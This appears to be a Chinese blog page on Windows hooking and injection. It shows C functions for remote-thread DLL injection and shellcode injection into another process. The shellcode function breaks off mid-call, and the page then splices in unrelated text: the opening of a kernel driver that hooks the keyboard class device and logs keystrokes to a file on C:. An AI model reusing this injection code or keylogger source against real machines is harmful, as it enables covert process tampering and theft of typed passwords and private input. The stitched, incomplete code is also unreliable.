HOOK与注入

HOOK与注入

  • 远程线程DLL注入

/*************************************************
函数名称: InjectDll
函数功能: 远程线程注入
参数: 
	1.pDllPath  --dll全路径
	2.nPid		--进程pid
函数返回值:
	是否成功执行远程线程注入。
其它说明: 
	无
*************************************************/
bool InjectDll(char* pDllPath, int nPid)
{
   
   
	//获取目标进程的句柄
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, nPid);
	if (!hProcess)
	{
   
   
		printf("进程句柄获取失败\n");
		return false;
	}
	//从目标进程中申请一块内存,大小是DLL全路径的长度
	LPVOID lpBuf = VirtualAllocEx(hProcess, NULL,
		strlen(pDllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
	//把DLL全路径写入到刚刚申请的内存中
	DWORD dwWrite;
	WriteProcessMemory(hProcess, lpBuf, pDllPath,
		strlen(pDllPath) + 1, &dwWrite);
	//创建远程线程
	//(线程回调函数地址是LoadLibrary地址,参数是DLL路径地址)
	//Loadlibrary是kernel32.dll的函数,在不同进程中的高两g中的位置是相同的
	HANDLE hThread = CreateRemoteThread(hProcess, NULL, NULL,
		(LPTHREAD_START_ROUTINE)LoadLibraryA, lpBuf, NULL, NULL);
	//等待远程线程执行完毕
	WaitForSingleObject(hThread, -1);
	//释放资源
	VirtualFreeEx(hProcess, lpBuf, 0, MEM_RELEASE);
	CloseHandle(hProcess);
	return true;
}
------------------------------------------------------
// 代码实现
// define DLL "..\\Debug\\testDll.dll"
// int nPid;
// printf("输入PID:");
// scanf_s("%d", &nPid);
// InjectDll(DLL, nPid);

  • 远程线程代码注入

/*************************************************
函数名称: InjectCode
函数功能: 将opcode注入到目标进程并执行
参数: 
	1.pCode opcode字符串
	2.nSize opcode的大小
	3.nPid	注入目标进程的pid
*************************************************/
bool InjectCode(char* pCode,int nSize, int nPid)
{
   
   
	//获取目标进程的句柄
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, nPid);
	if (!hProcess)
	{
   
   
		printf("进程句柄获取失败\n");
		return false;
	}
	//从目标进程中申请一块内存,大小是注入代码opcode的大小
	LPVOID lpBuf = VirtualAllocEx(hProcess, NULL,
		nSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	//把opcode写入到刚刚申请的内存中
	DWORD dwWrite;
	WriteProcessMemory(hProcess, lpBuf, pCode,
		nSize, &dwWrite);
	//创建远程线程
	//(线程回调函数地址是注入的代码的地址)
	HANDLE hThread = CreateRemoteThread(hProcess, NULL, NULL,
		(LPTHREAD_START_ROUTINE)lpBuf, NULL, NULL, 
C语言写的ROOT记录器,编译通过了.#include "stdafx.h" #include "ScanCode.h" #include "DriverEntry.h" #include <stdarg.h> const WCHAR *DEVICE_NAME = L"\\Device\\MonkeyKingDeviceName"; const WCHAR *SYMOBL_NAME = L"\\??\\MonkeyKingSymbolicName"; const char *NT_DEVICE_NAME = "\\Device\\KeyboardClass0"; const char *LOG_FILE_NAME = "\\DosDevices\\c:\\MonkeyKing.txt"; int numPendingIrps = 0; /*---------------------------------------------------------------------------------------------------------------------------------------------*/ /************************************************************************ * 函数名称:DriverEntry * 功能描述:初始化驱动程序,定位和申请硬件资源,创建内核对象 * 参数列表: pDriverObject:从I/O管理器中传进来的驱动对象 pRegistryPath:驱动程序在注册表的中的路径 * 返回 值:返回初始化驱动状态 *************************************************************************/ STDAPI_(NTSTATUS) DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath ) { NTSTATUS retValue = STATUS_SUCCESS; TRACEMSG("初始化例程..."); pDriverObject->DriverUnload = OnUnload; for (INT32 i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++){ pDriverObject->MajorFunction[i] = DispatchHandler; } pDriverObject->MajorFunction[IRP_MJ_READ] = DispatchRead; TRACEMSG("初始化例程...完成"); //创建设备。 TRACEMSG("创建设备..."); PDEVICE_OBJECT pKeyboardDevice = NULL; if (!NT_SUCCESS(retValue = CreateDevice(pDriverObject, &pKeyboardDevice))) { TRACEMSG("创建设备...失败"); return retValue; } TRACEMSG("创建设备...完成。键盘设备对象指针为:0x%x", pKeyboardDevice); //挂接设备。 TRACEMSG("挂接设备..."); if (!NT_SUCCESS(retValue = HookKeyboard(pKeyboardDevice))) { TRACEMSG("挂接设备...失败"); return retValue; } TRACEMSG("挂接设备...完成"); TRACEMSG("初始化线程..."); if (!NT_SUCCESS(retValue = InitThreadLogger(pDriverObject))) { TRACEMSG("初始化线程...失败"); return retValue; } TRACEMSG("初始化线程...完成");
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值